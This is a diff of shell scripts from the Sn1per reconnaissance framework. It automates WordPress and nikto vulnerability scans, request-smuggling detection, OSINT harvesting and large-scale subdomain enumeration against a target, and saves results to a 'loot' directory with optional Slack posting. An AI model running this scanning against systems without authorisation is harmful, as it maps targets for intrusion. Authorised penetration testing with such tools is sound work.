/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -128,9 +136,17 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/cmsmap-$TARGET-httpsb.txt
|
||||
if [[ "$WP_API_KEY" ]]; then
|
||||
wpscan --url https://$TARGET --no-update --disable-tls-checks --api-key $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks --api-key $WP_API_KEY 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpsb.txt
|
||||
echo ""
|
||||
else
|
||||
wpscan --url https://$TARGET --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpsa.txt
|
||||
echo ""
|
||||
wpscan --url https://$TARGET/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-httpsb.txt
|
||||
echo ""
|
||||
fi
|
||||
fi
|
||||
if [[ "$NIKTO" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -159,12 +175,12 @@ if [[ "$MODE" = "web" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP REQUEST SMUGGLING DETECTION $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py -u https://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port443.txt
|
||||
python3 /usr/share/sniper/plugins/smuggler/smuggler.py --no-color -u https://$TARGET | tee $LOOT_DIR/web/smuggler-$TARGET-port443.txt
|
||||
fi
|
||||
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
|
||||
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per HTTPS web scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
fi
|
||||
|
|
@ -22,7 +22,7 @@ if [[ "$MODE" = "nuke" ]]; then
|
|||
fi
|
||||
args="$args --noreport --noloot"
|
||||
TARGET="$a"
|
||||
args="$args -t $TARGET"
|
||||
args="$args -t $TARGET -b"
|
||||
echo -e "$OKRED "
|
||||
echo -e "$OKRED ____"
|
||||
echo -e "$OKRED __,-~~/~ \`---."
|
||||
|
|
@ -40,13 +40,10 @@ if [[ "$MODE" = "nuke" ]]; then
|
|||
echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET"
|
||||
echo -e "$RESET"
|
||||
if [[ ! -z "$WORKSPACE_DIR" ]]; then
|
||||
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
|
||||
sniper $args | tee $WORKSPACE_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
else
|
||||
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
|
||||
|
||||
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
|
||||
fi
|
||||
args=""
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
if [[ "$OSINT" = "1" ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ "$WHOIS" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -34,7 +34,7 @@ if [[ "$OSINT" = "1" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
cp -f /etc/theHarvester/api-keys.yaml ~/api-keys.yaml 2> /dev/null
|
||||
cd ~ 2> /dev/null
|
||||
theharvester-3.1 -d $TARGET -b baidu,bing,bingapi,certspotter,crtsh,dnsdumpster,dogpile,duckduckgo,google,hunter,intelx,linkedin,linkedin_links,netcraft,otx,securityTrails,spyse,threatcrowd,trello,twitter,vhost,virustotal,yahoo 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
|
||||
theHarvester -d $TARGET -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
|
||||
cd $INSTALL_DIR 2> /dev/null
|
||||
if [[ "$SLACK_NOTIFICATIONS_THEHARVESTER" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/theharvester-$TARGET.txt"
|
||||
|
|
@ -107,9 +107,9 @@ if [[ "$OSINT" = "1" ]]; then
|
|||
diff $LOOT_DIR/osint/github-urls-$ORGANIZATION.txt $LOOT_DIR/osint/github-urls-$ORGANIZATION.old 2> /dev/null > $LOOT_DIR/osint/github-urls-$ORGANIZATION.diff
|
||||
cat $LOOT_DIR/osint/github-urls-$ORGANIZATION.diff 2> /dev/null
|
||||
#python3 gitGraber.py -k wordlists/keywords.txt -q "\"$TARGET\"" -s 2>&1 | tee $LOOT_DIR/osint/gitGrabber-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
if [[ $SCAN_TYPE == "DOMAIN" ]] && [[ $OSINT == "1" ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
if [[ $GOOHAK = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -19,8 +19,8 @@
|
|||
rm -Rf output/ cookie.txt exploits.conf
|
||||
fi
|
||||
GHDB="1"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Finished Sn1per stage 2 OSINT scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
fi
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -1,8 +1,10 @@
|
|||
if [[ "$RECON" = "1" ]]; then
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per recon scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
|
||||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per recon scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per recon scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per recon scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
fi
|
||||
|
||||
touch $LOOT_DIR/domains/domains_old-$TARGET.txt 2> /dev/null
|
||||
cp $LOOT_DIR/domains/domains-$TARGET-full.txt $LOOT_DIR/domains/domains_old-$TARGET.txt 2> /dev/null
|
||||
|
||||
if [[ "$SUBLIST3R" = "1" ]]; then
|
||||
|
|
@ -12,7 +14,7 @@ if [[ "$RECON" = "1" ]]; then
|
|||
python /usr/share/sniper/plugins/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null > /dev/null
|
||||
sed -ie 's/<BR>/\n/g' domains-$TARGET-full.txt 2> /dev/null
|
||||
mv -f $LOOT_DIR/domains/domains-$TARGET.txte $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$AMASS" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -27,25 +29,25 @@ if [[ "$RECON" = "1" ]]; then
|
|||
echo -e "$OKRED GATHERING REVERSE WHOIS DNS SUBDOMAINS VIA AMASS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
amass intel -whois -d $TARGET > $LOOT_DIR/domains/domains-$TARGET-reverse-whois.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-reverse-whois.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-reverse-whois.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SUBFINDER" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER (THIS COULD TAKE A WHILE...) $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET -w $DOMAINS_DEFAULT -t 100 2>/dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-subfinder.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-subfinder.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$DNSCAN" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_QUICK -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_QUICK -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
|
||||
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt 2>/dev/null | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
sed -ie 's/<BR>/\n/g' $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
mv -f $LOOT_DIR/domains/domains-$TARGET.txte $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo ""
|
||||
if [[ "$CRTSH" = "1" ]]; then
|
||||
|
|
@ -55,11 +57,10 @@ if [[ "$RECON" = "1" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKBLUE"
|
||||
echo -e "$RESET"
|
||||
curl -s https://crt.sh/?q=%25.$TARGET > $LOOT_DIR/domains/domains-$TARGET-presorted.txt
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-presorted.txt | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/BR/\n/g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
#cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null
|
||||
echo ""
|
||||
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-crt.txt"
|
||||
fi
|
||||
|
|
@ -69,14 +70,14 @@ if [[ "$RECON" = "1" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKBLUE"
|
||||
spyse -target $TARGET --subdomains | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-spyse.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-spyse.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-spyse.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$CENSYS_SUBDOMAINS" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING CENSYS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python $PLUGINS_DIR/censys-subdomain-finder/censys_subdomain_finder.py --censys-api-id $CENSYS_APP_ID --censys-api-secret $CENSYS_API_SECRET $TARGET | egrep "\-" | awk '{print $2}' | egrep -v "Searching|Found" > $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-censys.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-censys.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$SHODAN" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -86,15 +87,15 @@ if [[ "$RECON" = "1" ]]; then
|
|||
shodan search "hostname:*.$TARGET" > $LOOT_DIR/domains/shodan-$TARGET.txt 2> /dev/null
|
||||
awk '{print $3}' $LOOT_DIR/domains/shodan-$TARGET.txt 2> /dev/null | grep -v "\;" > $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt 2> /dev/null
|
||||
awk '{print $1}' $LOOT_DIR/domains/shodan-$TARGET.txt 2> /dev/null >> $LOOT_DIR/ips/ips-all-unsorted.txt 2>/dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt
|
||||
wc -l $LOOT_DIR/ips/ips-all-unsorted.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-shodan-sorted.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$PROJECT_SONAR" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING PROJECT SONAR SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
curl -fsSL "https://dns.bufferover.run/dns?q=.$TARGET" | sed 's/\"//g' | cut -f2 -d "," | grep -v "<BR>" | sort -u | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-projectsonar.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$GITHUB_SUBDOMAINS" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -109,7 +110,7 @@ if [[ "$RECON" = "1" ]]; then
|
|||
curl -s "https://rapiddns.io/subdomain/$TARGET?full=1&down=1#exportData()" | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort -u | grep "$TARGET" | cut -d\/ -f3 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-rapiddns.txt 2> /dev/null
|
||||
fi
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-spyse.txt /dev/null > $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-spyse.txt /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
|
|
@ -121,14 +122,14 @@ if [[ "$RECON" = "1" ]]; then
|
|||
cat $LOOT_DIR/domains/targets.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
sed -i '/^$/d' $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
sed -i '/^$/d' $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET.txt | grep -v "*" | grep -v "?" > $LOOT_DIR/domains/domains-$TARGET-presorted-nowildcards.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET.txt
|
||||
cat $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null | grep -v "*" | grep -v "?" 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-presorted-nowildcards.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
if [[ "$SUBBRUTE_DNS" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING SUBBRUTE SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
python "$INSTALL_DIR/plugins/massdns/scripts/subbrute.py" $INSTALL_DIR/wordlists/domains-all.txt $TARGET 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-subbrute.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-subbrute.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-subbrute.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$ALT_DNS" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -136,45 +137,52 @@ if [[ "$RECON" = "1" ]]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" > /tmp/domain 2> /dev/null
|
||||
altdns -i /tmp/domain -w $INSTALL_DIR/wordlists/altdns.txt -o $LOOT_DIR/domains/domains-$TARGET-altdns.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-altdns.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-altdns.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$DNSGEN" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED GATHERING DNSGEN SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
dnsgen /tmp/domain > $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$MASS_DNS" = "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING MASSDNS ON SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
sort -u $LOOT_DIR/domains/domains-$TARGET-presorted-nowildcards.txt $LOOT_DIR/domains/domains-$TARGET-dnsgen.txt $LOOT_DIR/domains/domains-$TARGET-altdns.txt $LOOT_DIR/domains/domains-$TARGET-subbrute.txt 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-alldns.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-alldns.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-alldns.txt 2> /dev/null
|
||||
massdns -r /usr/share/sniper/plugins/massdns/lists/resolvers.txt $LOOT_DIR/domains/domains-$TARGET-alldns.txt -o S -t A -w $LOOT_DIR/domains/domains-$TARGET-massdns.txt > /dev/null
|
||||
awk -F ". " '{print $1}' $LOOT_DIR/domains/domains-$TARGET-massdns.txt | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt
|
||||
awk -F ". " '{print $1}' $LOOT_DIR/domains/domains-$TARGET-massdns.txt 2> /dev/null | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null >> $LOOT_DIR/domains/domains-$TARGET-presorted.txt 2> /dev/null
|
||||
grep "CNAME" $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-massdns-CNAME.txt
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-massdns-CNAME.txt
|
||||
grep "A " $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u > $LOOT_DIR/ips/massdns-A-records-$TARGET.txt
|
||||
wc -l $LOOT_DIR/ips/massdns-A-records-$TARGET.txt
|
||||
cat $LOOT_DIR/ips/massdns-A-records-$TARGET.txt >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/ips/ips-all-unsorted.txt
|
||||
#grep "CNAME" $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u > $LOOT_DIR/domains/domains-$TARGET-massdns-CNAME.txt
|
||||
#wc -l $LOOT_DIR/domains/domains-$TARGET-massdns-CNAME.txt
|
||||
#grep "A " $LOOT_DIR/domains/domains-$TARGET-massdns.txt | awk '{print $3}' | grep -v "*" | sort -u > $LOOT_DIR/ips/massdns-A-records-$TARGET.txt
|
||||
#wc -l $LOOT_DIR/ips/massdns-A-records-$TARGET.txt
|
||||
#cat $LOOT_DIR/ips/massdns-A-records-$TARGET.txt >> $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null
|
||||
#wc -l $LOOT_DIR/ips/ips-all-unsorted.txt
|
||||
fi
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-presorted.txt $LOOT_DIR/domains/domains-$TARGET-massdns-sorted.txt 2> /dev/null | sort -u 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-full.txt
|
||||
sed -ie 's/<BR>/\n/g' $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null
|
||||
mv -f $LOOT_DIR/domains/domains-$TARGET-full.txte $LOOT_DIR/domains/domains-$TARGET-full.txt 2> /dev/null
|
||||
wc -l $LOOT_DIR/domains/domains-$TARGET-full.txt
|
||||
